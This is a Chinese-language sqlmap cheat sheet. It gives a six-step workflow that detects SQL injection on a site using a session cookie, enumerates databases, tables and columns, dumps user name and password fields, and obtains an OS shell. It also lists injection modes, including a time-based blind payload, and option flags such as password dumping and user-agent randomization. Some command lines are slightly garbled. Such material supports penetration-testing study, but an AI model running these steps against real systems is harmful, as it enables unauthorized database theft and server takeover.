1、经典用法介绍（经典六步法）

第一步： -u "http://www.example.com" --cookie="abc" //带上cookie对url进行注入探测

第二步：-u "http://www.example.com" --cookie="abc" -current-db //对数据库名进行获取

第三步：-u "http://www.example.com" --cookie="abc" -D xyz --tables // 对数据库xyz的表名进行枚举

第四步：-u "http://www.example.com" --cookie="abc" -D xyz -T users --columns //对数据库xyz里面的名为users表的列名进行枚举

第五步：-u "http://www.example.com" --cookie="abc" -D xyz -T users -C name,password --dump //探测user表name和password字段

第六步：-u "http://www.example.com" --cookie="abc" --os -shell //获取shell，选择后台语言

2、注入模式

1、基于时间的盲注：1` and sleep(x) --//延时的时间减去正常的时间大于x

2、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。

3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。

4、联合查询注入，可以使用union的情况下的注入。

5、堆查询注入，可以同时执行多条语句的执行时的注入。

3、sqlmap详细命令：

–is-dba 当前用户权限（是否为root权限）

–dbs 所有数据库

–current-db 网站当前数据库

–users 所有数据库用户

–current-user 当前数据库用户

–random-agent 构造随机user-agent

–passwords 数据库密码

–proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理

–time-sec=TIMESEC DBMS响应的延迟时间（默认为5秒）

4、Request（请求）：

这些选项可以用来指定如何连接到目标URL。

–data=DATA 通过POST发送的数据字符串

–cookie=COOKIE HTTP Cookie头

–cookie-urlencode URL 编码生成的cookie注入

–drop-set-cookie 忽略响应的Set – Cookie头信息

–user-agent=AGENT 指定 HTTP User – Agent头

–random-agent 使用随机选定的HTTP User – Agent头

–referer=REFERER 指定 HTTP Referer头

–headers=HEADERS 换行分开，加入其他的HTTP头

–auth-type=ATYPE HTTP身份验证类型（基本，摘要或NTLM）(Basic, Digest or NTLM)

–auth-cred=ACRED HTTP身份验证凭据（用户名:密码）

–auth-cert=ACERT HTTP认证证书（key_file，cert_file）

–proxy=PROXY 使用HTTP代理连接到目标URL

–proxy-cred=PCRED HTTP代理身份验证凭据（用户名：密码）

–ignore-proxy 忽略系统默认的HTTP代理

–delay=DELAY 在每个HTTP请求之间的延迟时间，单位为秒

–timeout=TIMEOUT 等待连接超时的时间（默认为30秒）

–retries=RETRIES 连接超时后重新连接的时间（默认3）

–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式

–safe-url=SAFURL 在测试过程中经常访问的url地址

–safe-freq=SAFREQ 两次访问之间测试请求，给出安全的URL

更多详细内容可参考：http://www.vuln.cn/1992